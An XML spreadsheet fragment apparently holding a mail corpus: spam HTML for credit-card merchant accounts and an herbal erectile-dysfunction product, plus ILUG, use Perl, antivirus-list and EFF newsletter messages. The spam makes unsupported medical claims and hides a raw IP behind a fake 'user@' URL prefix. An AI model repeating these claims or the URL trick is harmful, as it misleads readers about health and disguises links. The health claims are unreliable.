 61.129.81.74/images/add1.2.gif"&gt;Just the fact that you accept credit cards=
  adds credibility to your business. Especially if you are a New, Small or =
 Home Based Business.&lt;p&gt;
 &lt;blockquote&gt;&lt;font color=3D"FC040A"&gt;&lt;li&gt;No Payment For The First Month!&lt;/li=
 &gt;&lt;br&gt;
 &lt;li&gt;Setup within 3-5 Days&lt;/li&gt;&lt;/font&gt;&lt;/blockquote&gt;&lt;p&gt;
 Approval is quick and our set up times range from 3 - 5 days. Guaranteed a=
 pproval on all leases for equipment or software. Bad credit, no credit, no=
  problem!&lt;p&gt;
 &lt;center&gt;&lt;font size=3D"4" color=3D"FC040A"&gt;ACCEPT CREDIT CARDS ONLINE or OF=
 FLINE !!&lt;/font&gt;&lt;p&gt;&lt;br&gt;
 &lt;font size=3D"4" color=3D"FC040A"&gt;&lt;a href=3D"http://www.910736149710429186=
 250134857@61.129.81.74/bp/mer1/index.html"&gt;CLICK HERE&lt;/a&gt;&lt;/center&gt;&lt;/font&gt;&lt;=
 p&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;table bgcolor=3D"#ffffff"&gt;
 &lt;tr&gt;
 	&lt;td class=3D"footer" align=3D"justify" valign=3D"top"&gt;
 If you'd like to be removed from our mailing list, please click on the lin=
 k below. &lt;p&gt;
 We protect all email addresses from third parties. Thank you. &lt;a href=3D"h=
 ttp://61.129.81.74/remove/remove.htm"&gt;Please remove me.&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 10:00:02PM +0100, Matthew French wrote:
 &gt; Now here is a thought: a Unix version of the "Deleted Items" folder.
 am i the only one who thinks this is like "friday night 80's" for ilug?
 and here's an answer from 1989.  for those perceptive folks in the
 audience you'll note that it makes no reference to a windows icons.
 http://groups.google.com/groups?q=unix+undelete&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;as_drrb=b&amp;as_mind=12&amp;as_minm=5&amp;as_miny=1981&amp;as_maxd=19&amp;as_maxm=7&amp;as_maxy=1989&amp;selm=10113%40bloom-beacon.MIT.EDU&amp;rnum=10
 and here's one from 1984:
 http://groups.google.com/groups?q=unix+undelete&amp;start=10&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;as_drrb=b&amp;as_mind=12&amp;as_minm=5&amp;as_miny=1981&amp;as_maxd=19&amp;as_maxm=7&amp;as_maxy=1989&amp;selm=736%40sri-arpa.UUCP&amp;rnum=14
 on a more serious note....  would unrm be nice?  yeah.  but people have
 talked about unrm for nearly ***20*** years - and that's just what i
 bothered to look up.  think about it.  in that time bsd has been freed
 from at&amp;t and then forked in four different directions, gcc, linux,
 mozilla, gnome and kde have been written.  as has almost every bit
 of the gnu project - including (sh|file)-utils.  and think about it,
 have the gnu (sh|file)-utils developers ever met an option they didn't
 implement if they could?  even /bin/true and /bin/false take arguments.
 so yeah, unrm would be nice, but obviously it's not a simple problem.
 millions of lines of code, hundreds of projects, no unrm.  heck, the
 hurd will probably release 1.0 before unrm shows up.
 kevin, spinning the oldies all night long...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</si>
  <si>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 In forteana@y..., "D.McMann" &lt;dmcmann@b...&gt; wrote:
 &gt; Jeffrey Archer: The Truth 
 Hehe...brilliant!
 I especially liked the little touches like the flying pigs when Maggie
 tells him she wants him to be her successor.
 I can imagine him watching this in his cell and thinking that it is
 all perfectly true as he recalls it!
 Rob
 Have you seen the missing "Have you seen" sign?
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Raging Hard Erection Formula
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;meta name="GENERATOR" content="Mozilla/4.77 [en] (Windows NT 5.0; U) [Netscape]"&gt;
    &lt;title&gt;moiad&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table BORDER=0 WIDTH="650" BGCOLOR="#FFFFFF" &gt;
 &lt;tr&gt;
 &lt;td HEIGHT="20"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=RIGHT&gt;&lt;!-- main frame --&gt;
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td WIDTH="450"&gt;&lt;!-- page frame --&gt;
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="440" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#3333FF"&gt;Herbal Alternative
 for Erectile Dysfunction&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&lt;b&gt;Men of Iron&lt;/b&gt; has been featured on
 over 100 TV News and Top Radio stations across America, and we know why...&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;It REALLY works!&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;&lt;a href="http://65.172.81.187/"&gt;Visit Our Web Site Click Here: 
 Learn about our special offer!&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="440" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Men Of Iron Benefits:&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Number 1 formula for men&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Dramatically Enhances Organism&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; No Negative Side Effects (All Natural
 Ingredients).&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Boosts Multiple Orgasms!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Does Not Increase Blood Pressure! &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Increases circulation in men so erections
 become firmer.&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Helps sexual response dysfunction or
 lack of interest in sex.&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Clears impotency problems. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Boosts Multiple Climaxes. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Relieves Emotional Ups Downs, and Headaches!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Helps Relieve Prostate Problems. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Lowers Cholesterol. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Very Affordable Price&lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;a href="http://65.172.81.187/"&gt;Visit Our Web Site Click Here: 
 Learn about our special offer!&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=-2&gt; &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- page frame --&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- main frame --&gt;
 &lt;br&gt; 
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-23
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * YAPC 2003 Call For Venues
 +--------------------------------------------------------------------+
 | YAPC 2003 Call For Venues                                          |
 |   posted by KM on Sunday September 22, @09:08 (news)               |
 |   http://use.perl.org/article.pl?sid=02/09/22/1312225              |
 +--------------------------------------------------------------------+
 [0]Yet Another Society/[1]The Perl Foundation is making a call for venues
 for the 2003 YAPC::America. Don't forget to check the [2]venue
 requirements, the YAPC::Venue module on CPAN, and talk to the organizers
 of YAPCs past. The Perl Foundation aims to announce the venue in November
 2002.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/22/1312225
 Links:
     0. http://yetanother.org
     1. http://perlfoundation.org
     2. http://www.yapc.org/venue-reqs.txt
 Copyright 1997-2002 pudge.  All rights reserved.
 ======================================================================
 You have received this message because you subscribed to it
 on use Perl.  To stop receiving this and other
 messages from use Perl, or to add more messages
 or change your preferences, please go to your user page.
 	http://use.perl.org/my/messages/
 You can log in and change your preferences from there.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SV: More content filtering woes
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Thor,
 [Still trying to catch my breath] :-)
 I guess there's no easy way to avoid this. In order to proactively
 protect endusers they'll need to put such code (or part of it) into
 their defs. Since antivirus products still gets smarter and smarter and
 heuristics are getting better and better the odds aginst not running
 into false positives are poor. Some products will woe plenty of these
 some are better to avoid the madness (!). I'll leave you to do the test.
 Consider that corporate and endusers are most likely using Microsoft
 software without updating as they should. AV-software is now trying to
 protect these poor souls adding proxy functionality to catch e.g.
 malicious content in HTML based e-mails and for a good reason. Looking
 at http://www.pivx.com/larholm/unpatched/ says it all!  ;-)
 Med venlig hilsen // Kind regards
 Peter Kruse
 Security- and Virusanalyst
 Telia @ Security
 http://www.teliainternet.dk
 Member of AVIEN and FIRST
 &gt; -----Oprindelig meddelelse-----
 &gt; Fra: Thor Larholm [mailto:Thor@jubii.dk] 
 &gt; Sendt: 5. august 2002 10:13
 &gt; Til: 'nick@virus-l.demon.co.uk'; FOCUS-VIRUS@SECURITYFOCUS.COM
 &gt; Emne: RE: More content filtering woes
 &gt; 
 &gt; 
 &gt; What I find even more annoying is the horde of false 
 &gt; positives that antivirus software constantly yaps one about 
 &gt; each time one sends some demonstratory POC to a mailinglist 
 &gt; only to have several witless antivirus vendors add ones POC 
 &gt; to their virus library, yielding tons of "Quarantined" 
 &gt; replies on a daily basis without any added level of security 
 &gt; to the enduser whatsoever since any reallife exploitation 
 &gt; would yield a completely different signature, thus defeating 
 &gt; the purpose of adding ones signature.
 &gt; 
 &gt; *phew* That could have used some punctuation. :)
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; Regards
 &gt; Thor Larholm
 &gt; Jubii A/S - Internet Programmer
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 24       August 9, 2002      ren@eff.org
 A Publication of the Electronic Frontier Foundation	  ISSN 1062-9424
 In the 224th Issue of EFFector:
 * EFF Submits Letter to FCC Chairman Regarding BPDG Proposal
 * Update on Intel Corp. v. Hamidi
 * DeCSS Author Johansen's Trial Rescheduled
 * Bunnie Presents Paper on XBox Reverse Engineering
 * Thanks to DefCon!
 * EFF Booth at LinuxWorld
 * Deep Links: Baen Books' Releases Reader-Friendly E-Books
 * Deep Links: Janis Ian on P2P
 * Deep Links: Hometown Paper Discusses Rep. Coble's Support of 
 	Berman P2P Hacking Bill
 * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
 http://www.eff.org/support/ 
 EFF is a member-supported nonprofit.
 Please sign up as a member today!
 --------------------------------------------------------------------
 * EFF Submits Letter to FCC Chairman Regarding BPDG Proposal
 The Honorable Michael K. Powell Chairman Federal Communications
 Commission 445 12th Street, S.W. Suite 8C453 Washington, DC 20554
 BY FACSIMILE, ELECTRONIC MAIL, AND POSTAL MAIL
 Dear Chairman Powell:
 I am writing to you today in regards to the digital television
 Broadcast Flag; specifically, I write in response to Sen. Hollings'
 and Representatives Dingell and Tauzin's letters of July 19, which
 urged you to mandate the Broadcast Flag proposal outlined in the
 final report of the Broadcast Protection Discussion Group.
 The Electronic Frontier Foundation (EFF) is a donor-supported
 non-profit organization that works to uphold civil liberties
 interests in technology policy and law. EFF has played a critical
 role in safeguarding crucial freedoms related to computers, the
 Internet and consumer electronics devices, defeating the restriction
 on strong cryptography exports; securing the legal principle that
 Internet wiretaps must only proceed in conjunction with a warrant;
 and defending academics, researchers and commercial interests
 against DMCA-related prosecution.
 EFF was an active participant in the Broadcast Protection Discussion
 Group. We attended the group's meetings and conference calls and
 participated in the group's policy and technical mailing-lists. EFF
 also maintains a web-site that was and is the only public source of
 information on the Broadcast Flag negotiations and proposal. The
 site can be found at http://bpdg.blogs.eff.org. EFF devoted
 thousands of staff-hours to publicizing the existence and nature of
 the BPDG to the public, to civil liberties and consumer-advocacy
 groups, and to entrepreneurial companies and software authors whose
 products were threatened by the proceedings.
 When you and I met at Esther Dyson's PC Forum last March, we spoke
 briefly about the civil liberties interests that would be undermined
 by the Broadcast Protection Discussion Group's mandate. The BPDG
 proposal will have grave consequences for innovation, free
 expression, competition and consumer interests. Worst of all, it
 will add unnecessary complexity and expense to the DTV transition,
 compromising DTV adoption itself.
 As you are aware, technologists have traditionally manufactured
 those devices they believed would be successful in the market, often
 in spite of the misgivings of rights-holders. From the piano roll to
 the PVR, technologists have enjoyed the freedom to ship whatever
 products they believe the public will pay for; what's more,
 innovation has always thrived best where there were the fewest
 regulatory hurdles. NTSC tuners and devices are governed by precious
 few regulations, and consequently we see a rich field of products
 that interact with them, from the VCR Plus to tuner-cards for PCs to
 the PVR. The Broadcast Flag proposal would limit technologists to
 shipping those products that met with the approval of MPAA member
 companies. No entrepreneur or software author will know, a priori,
 whether his innovative DTV product will be legal in the market until
 he has gone to the expense of building it and taking it around to
 the Hollywood studios for review.
 Consumers and industry alike have benefitted greatly from the "Open
 Source" or "Free Software" movement, in which technologies are
 distributed in a form that encourages end-user modification. From
 server-software like the web-wide success-story apache, to operating
 systems like GNU/Linux, to consumer applications like the Mozilla
 browser, Free Software is a powerful force for innovation, consumer
 benefit and commercial activity. The BPDG proposal implicitly bans
 Free Software DTV applications -- such as the DScaler de-interlacer
 and the GNU Radio software-defined radio program -- as these
 applications are built to be modified by end-users, something that
 is banned under the BPDG proposal. The tamper-resistance component
 of the BPDG's "Robustness Requirements" will create and entire class
 of illegal software applications, abridging the traditional First
 Amendment freedom enjoyed by software authors who create expressive
 speech in code form under one of several Free Software/Open Source
 licenses.
 The BPDG nominally set out to create an objective standard, a bright
 line that technologists could hew to in order to avoid liability
 when deploying their products. However, the end product of the BPDG
 was a "standard" that contained no objective criteria for legal
 technology; rather, the standard required that new technologies be
 approved by MPAA member companies. Not uncoincidentally, the only
 technologies that were approved by the MPAA -- and hence the only
 legal technologies -- were those produced by the 4C and 5C
 consortia, a group of technology companies that acted as the MPAA's
 allies throughout the BPDG process. This is an harbinger of the sort
 of regime that the BPDG standard will usher in: technology companies
 will be able to shut their competitors out of the marketplace by
 allying themselves with Hollywood, brokering deals to allow certain
 technologies and outlaw others.
 The marketplace is a proven mechanism for rapidly and efficiently
 producing products that increase the value and desirability of new
 technologies, such as DTV. A BPDG mandate would subvert the market
 for DTV innovation. Competing companies with lower-cost DTV
 technology alternatives would be restrained from bringing these to
 market if they failed to assuage the MPAA's concerns about
 unauthorized redistribution. Furthermore, the universe of
 unauthorized-but-lawful uses for DTV programming will be shrunk down
 to the much smaller space of explicitly authorized uses. The ability
 of the public to make unauthorized-but-lawful uses of television
 programming has been an historical force for increasing the value of
 broadcast programming, from the VCR to the PVR.
 Ironically, the inevitable damage that a Broadcast Flag mandate
 would do to innovation, competition and consumer interests can only
 slow down DTV adoption, by driving up the cost of DTV devices while
 reducing the number of desirable features that an open market would
 create. If the public is offered less functionality for more money,
 they will not flock to DTV.
 The most disheartening thing about the Broadcast Flag is that there
 is neither a strong case that the Broadcast Flag is a necessary tool
 for protecting copyright, nor that the Broadcast Flag would be
 effective in that role. The existing practice of Internet
 infringement of broadcast programming -- analog captures from
 devices that satisfy the requirements of the BPDG proposal -- would
 not be stopped by the presence of a Broadcast Flag.
 Higher-resolution DTV signals will likewise present no challenge to
 determined infringers, who can capture full-quality analog signal
 from DTV devices and then re-digitize them, suffering only a single
 generation's worth of loss-of-quality before the programming enters
 the Internet.
 Meanwhile, the underlying rubric for a Broadcast Flag -- that
 infringement will undermine Hollywood's business to the point that
 movies will no longer be available to the public, reducing the value
 of DTV -- is no more than superstition. No credible study or
 analysis, undertaken by a neutral party, has ever been presented to
 Congress, the FCC, the CPTWG or the BPDG supporting this notion. The
 public is being asked to sacrifice its rights in copyright; industry
 is being asked to place its right to innovation in the hands of
 entertainers; the US government is being asked to mandate
 extraordinary, unprecedented regulation of the $600 billion
 technology sector -- all on the uncorroborated opinions of a few
 studio executives.
 EFF welcomes the FCC's oversight of the Broadcast Flag issue. The
 BPDG proceedings took place behind a shroud of secrecy, in a
 looking-glass "public process" where only those participants the
 organizers wanted to hear from were made privy to its existence,
 where the co-chairs invented rules and processes on the fly to suit
 the needs of the entertainment interests and the technology
 companies that had privately secured a promise of a legal monopoly
 for their products, where the press was banned.
 The FCC has an admirable tradition of seeking and weighing public
 opinion in its proceedings. As the FCC considers the Broadcast Flag,
 EFF hopes that it will start anew, setting aside the findings of the
 BPDG in light of the concerns raised by Microsoft, Philips, Sharp,
 Thomson, and Zenith, as well as non-profit organizations including
 EFF, Consumers Union, Consumer Federation of America, the Free
 Software Foundation, Public Knowledge, digitalconsumer.org, the
 Center for Democracy in Technology, and the Computer and
 Communications Industry Association.
 Thank you for attention in this matter. Please let me know if we can
 be of any further assistance to you.
 Sincerely yours,
 Cory Doctorow for the Electronic Frontier Foundation
 Links: 
 EFF's BPDG Blog: 
 http://bpdg.blogs.eff.org 
 An overview of our concerns with the broadcast flag:
 http://bpdg.blogs.eff.org/archives/one-page.pdf 
 Letter from Sen. Hollings: 
 http://bpdg.blogs.eff.org/archives/000155.html 
 Letter from Rep. Tauzin: 
 http://bpdg.blogs.eff.org/archives/000156.html
 --------------------------------------------------------------------
 * Update on Intel Corp. v. Hamidi
 Intel Corp. v. Hamidi is now on appeal to the California Supreme
 Court. EFF filed an amicus brief in support of Ken Hamidi on Aug. 6,
 2002. The facts are simple: Over about two years, Hamidi on six
 occasions sent e-mail critical of Intel's employment practices to
 between 8,000 and 35,000 Intel employees. Intel demanded that Hamidi
 stop, but he refused. Intel obtained an injunction barring Hamidi
 from e-mailing Intel employees at their Intel e-mail addresses,
 based on the common-law tort of "trespass to chattels." ("Chattel"
 is a legal term that refers to personal property, as opposed to
 property in land.)
 EFF's amicus brief argues three main points.
 (1) Intel did not qualify for relief under "trespass to chattels"
 because Intel's e-mail servers were not themselves harmed by
 Hamidi's e-mails. If Intel was harmed, it was because the content of
 Hamidi's e-mails affected Intel employees, not because sending the
 e-mails affected the functioning of Intel's servers.
 (2) By focusing on unwanted "contact" with the chattel and ignoring
 the harm requirement, the court of appeal turned "trespass to
 chattels" into a doctrine that threatens common Internet activity
 like search engines and linking. For example, if a website posted a
 "no trespassing" sign, any "contact" by a search engine could be
 considered a trespass even if it caused no harm.
 (3) The court of appeal wrongly held that the injunction did not
 infringe Hamidi's freedom of speech. The First Amendment limits
 private parties' legal remedies in many areas of law, such as libel,
 out of concern that private parties will use the law to suppress
 criticism. The same principle should apply here, where Intel's
 claims of harm stem from the meaning of Hamidi's speech.
 Links: 
 The Intel v. Hamidi Archive:
 http://www.eff.org/Cases/Intel_v_Hamidi/
 - end -
 --------------------------------------------------------------------
 * DeCSS Author Johansen's Trial Rescheduled
 The trial of Norwegian teen Jon Johansen, who created the
 controversial DeCSS software, has been pushed back again. It is now
 scheduled to be heard on December 9, 2002, in Oslo, Norway. In the
 fall of 1999, Johansen and his team reverse-engineered the content
 scrambling system (CSS) software used to encrypt DVDs in an effort
 to build a DVD player for the Linux operating system. In January of
 2002, the Norwegian Economic Crime Unit (OKOKRIM) charged Johansen
 with a violation of Norwegian Criminal Code Section 145.2, which
 outlaws breaking into a third-party's property in order to steal
 data that one is not entitled to. This prosecution marks the first
 time the law will be used to prosecute a person for accessing his
 own property (his own DVD). Johansen faces two years in prison if
 convicted. The prosecution is based on a formal complaint filed by
 the Motion Picture Association.
 The trial had originally been scheduled to take place in June of 
 2002 but was rescheduled when the court could not find any qualified 
 judges to hear Johansen's case.  Now the case is scheduled to be 
 heard by a three-judge panel. Help Jon in his battle against 
 Hollywood movie studios, donate to his legal defense fund at: 
 http://www.eff.org/support/jonfund.html
 Links: 
 The DeCSS/Johansen Archive:
 http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/
 Digital Rights Management Archive: 
 http://www.eff.org/IP/DRM/
 - end -
 --------------------------------------------------------------------
 * Bunnie Presents Paper on XBox Reverse Engineering
 Paper Explains Flaw in Videogame Security System
 Researcher Escapes Chilling Effect of Digital Copyright Law
 Electronic Frontier Foundation Media Advisory
 For Immediate Release: Thursday, August 9, 2002
 San Francisco - The Electronic Frontier Foundation (EFF) is pleased
 to announce that former MIT doctoral student Andrew "Bunnie" Huang
 will present a paper explaining a security flaw in the Microsoft
 Xbox (TM) videogame system.
 Huang will present his paper, "Keeping Secrets in Hardware: the
 Microsoft X-BOX Case Study," at 5:25 p.m. PDT on August 13, 2002, at
 the 2002 Workshop on Cryptographic Hardware and Embedded Systems
 (CHES 2002) in Redwood City, California (Aug. 13-15, 2002).
 The Xbox security system is intended to allow people to play only
 videogames authorized by Microsoft. Huang's paper "shows how a
 person could defeat that system with a small hardware investment,"
 said MIT Professor Hal Abelson, one of Huang's advisors. "More
 importantly, the paper relates the security vulnerability to a
 general design flaw shared by other high-profile security systems
 such as the government's Clipper Chip and the movie industry's
 Contents Scrambling System (CSS) for DVD players."
 Huang contacted EFF in March after his advisors told him that his
 preliminary findings raised potentially significant legal questions.
 With the help of Boston College law professor Joe Liu, EFF worked
 with Huang, Abelson, and MIT administrators to analyze the legal
 issues and draft letters notifying Microsoft of Huang's research
 findings and intended publication, one of the steps encouraged by
 Digital Millennium Copyright Act (DMCA).
 Microsoft told Huang and Abelson that while it might prefer that the
 paper not be published, it would be inappropriate to ask MIT to
 withhold the paper.
 "Microsoft deserves praise for making no attempt to control
 publication," said Abelson. "Their response shows that they value
 academic freedom, and that they appreciate the critical role of
 unfettered research and publication in advancing technology."
 Other companies have reacted otherwise, using the DMCA to threaten
 researchers. The Recording Industry Association of America last year
 warned Princeton Professor Edward Felten after his research team
 exposed weaknesses in digital music security technologies. Last
 month, Hewlett Packard (HP) threatened research collective SnoSoft
 over exposing a security vulnerability in HP's Tru64 Unix operating
 system. Soon after, HP clarified that it would not use the DMCA to
 stifle research or impede the flow of information that would improve
 computer security.
 Huang said that while he is glad he can openly present his paper,
 "The DMCA clearly had a chilling effect on my work. I was afraid to
 submit my research for peer review until after the EFF's efforts to
 clear potential legal restraints."
 "Researchers should be analyzing security, not worrying about
 getting sued," said EFF Senior Staff Attorney Lee Tien.
 Links:
 For this release:
 http://www.eff.org/IP/DMCA/20020808_eff_bunnie_pr.html
 For Huang's paper:
 ftp://publications.ai.mit.edu/ai-publications/2002/AIM-2002-008.pdf
 For the CHES program: http://islab.oregonstate.edu/ches/program.html
 EFF "Unintended Consequences: Three Years Under the DMCA" report:
 http://www.eff.org/IP/DMCA/20020503_dmca_consequences.pdf
 RIAA sues Professor Edward Felten over SDMI:
 http://www.eff.org/Legal/Cases/Felten_v_RIAA/
 An article about Hewlett-Packard's threatening SnoSoft:
 http://www.wired.com/news/technology/0,1282,54297,00.html
 - end -
 --------------------------------------------------------------------
 * EFF Thanks Defcon
 EFF thanks The Dark Tangent and other organizers of the DEF CON X
 convention for their generous donation of exhibition space at DEF
 CON (http://www.defcon.org/). DEF CON is an "underground" computer
 security conference held each summer in Las Vegas.
 Links: 
 Defcon Website: 
 http://www.defcon.com/
 - end -
 --------------------------------------------------------------------
 * EFF Booth at LinuxWorld
 Come visit EFF at booth #488 at Linuxworld next week. We'll be
 passing out information, good cheer, and a slew of new stickers.
 When: August 13 - 15
 	10a - 5p
 Where: Booth #5
 	Moscone Center 
 	747 Howard Street
 	San Francisco, CA 94103
 Links: 
 LinuxWorld Conference Website: 
 http://www.linuxworldexpo.com/
 Floor Map and EFF Booth:
 http://www.linuxworldexpo.com/linuxworldexpo/v31/floorplan/floorplan
 .cvn?b=97&amp; exbID=50
 - end -
 --------------------------------------------------------------------
 Deep Links 
 Deep Links is a new department in the EFFector featuring noteworthy 
 news-items, victories and threats from around the Internet.
 * Baen Books expands fair-use-friendly e-book program
 Baen Books will bind a CD-ROM into the October 2002 hardcover
 edition of *War of Honor,* the latest volume in David Weber's epic
 Honor Harrington space-opera. The CD will contain at least 22
 complete novels, all in open formats like html and RTF, with the
 fair-use-friendly admonishment "This disk and its contents may be
 copied and shared but NOT sold." Included on the disk are the entire
 Honor Harrington series to date, as well as other titles from the
 Baen line, including Keith Laumer's *Retief!* and Larry Niven and
 Jerry Pournelle's *Fallen Angels*.
 Baen has been a banner-carrier for fair-use in electronic
 publishing, shipping text and html files that can be played on a
 multitude of devices. Other publishers have chosen to publish their
 material in copy-controlled formats that make it impossible to
 legally loan or resell the titles you purchase, are locked to a
 specific device, can't play on every operating system, and
 occasionally lock out assistive technology like the screen-readers
 employed by the blind.
 Dmitry Skylarov, a Russian scientist, was arrested in July 2001, for
 demonstrating how end-users could defeat the copy-prevention
 employed by Adobe's e-book technology. Adobe asked the FBI to arrest
 Skylarov for violating the Digital Millennium Copyright Act (DMCA),
 which makes it a crime to describe techniques for circumventing
 copy-prevention technology. Though Skylarov was later released, his
 employer, ElcomSoft, is still facing charges in the USA, and the
 Russian government has issued an advisory warning Russian scientists
 to steer clear of American technical conferences until the DMCA is
 repealed.
 Here is Baen's statement on the CD release:
 You are about to start playing with a CD-ROM that has fairly
 extraordinary content. As of this writing it includes twenty-two
 UNENCRYPTED novels in several formats, the ten Honor Harrington
 Novels, 3 Honor Harrington Anthologies and 9 novels by friends of
 Honor, and by the time of distribution it may well contain more.
 (More than twenty novels for free, and with no stupid codes to work
 around. Think of that.) The reason for the plethora of formats is to
 try to please the people who want to read the novels on their Palm
 Pilots or other text-specialized palm-sized devices.
 Links:
 Baen Books's page for *War of Honor*:
 http://www.baen.com/orientation.htm
 Slashdot discussion of *War of Honor* release:
 http://slashdot.org/article.pl?sid=02/08/03/2314232&amp;mode=flat&amp;tid=
 149
 EFF documents on Dmitry Skylarov and ElcomSoft:
 http://www.eff.org/IP/DMCA/US_v_Elcomsoft/
 EFF documents on the Digital Millennium Copyright Act (DMCA):
 http://www.eff.org/IP/DMCA/
 - end -
 * Singer/Songwriter Janis Ian on P2P Lucid article on the benefits of
 peer-to-peer networks form an artists' perspective.
 http://www.janisian.com/article-internet_debacle.html
 - end -
 * Hometown Paper Discusses Rep. Coble's Support of Berman P2P Hacking
 Bill Column on how a good Representative can make a bad call.
 http://www.news-record.com/news/columnists/staff/cone04.htm
 - end -
 --------------------------------------------------------------------
 Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation 
 454 Shotwell Street 
 San Francisco
 CA 94110-1914 USA 
 +1 415 436 9333 (voice) 
 +1 415 436 9993 (fax) 
 http://www.eff.org/
 Editor: Ren Bucholz, 
 	Activist 
 	ren@eff.org
 To Join EFF online, or make an additional donation, go to: 
 http://www.eff.org/support/
 Membership &amp; donation queries: 
 membership@eff.org 
 General EFF, legal, policy or online resources queries: 
 ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors
 for their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, plese visit:
 http://action.eff.org/subscribe/. 
 &gt;&gt;From there, you can update all your information. If you have already 
 subscribed to the EFF Action Center, please visit:
 http://action.eff.org/action/login.asp.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at: 
 http://www.eff.org/effector
 To get the latest issue, send any message to
 effector-reflector@eff.org (or er@eff.org), and it will be mailed to
 you automatically. You can also get it via the Web at:
 http://www.eff.org/pub/EFF/Newsletters/EFFector/current. html
 ++++++++++++++++++++++++
 You received this message because qqqqqqqqqqs-eff@spamassassin.taint.org is a member of 
 the mailing list originating from alerts@action.eff.org. To unsubscribe from 
 all mailing lists originating from alerts@action.eff.org, send an email to 
 alerts@action.eff.org with "Remove" as the only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: tmda (was: Re: [ILUG] jpeg patented...)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 11:12:34PM +0100, Paul Jakma wrote:
 &gt; oh yes, see you've setup that tdma thingy, so here's a thought. do
 &gt; you reckon spammers (or the software they use) is/are smart enough to
 &gt; 
 &gt; 	s/\(.\)+\+.*@\([a-zA-Z\.0-9\-]\)/\1@\2/
 &gt; 
 &gt; on email addresses? it's a fairly old trick, so i dont see why they
 &gt; wouldnt.
 the dated address that my from appears as is a good address for five days
 for anyone.  after that it requires a confirm message from the sender.
 my regular email address requires a confirm address if i haven't
 explicitly given permission to the sender.
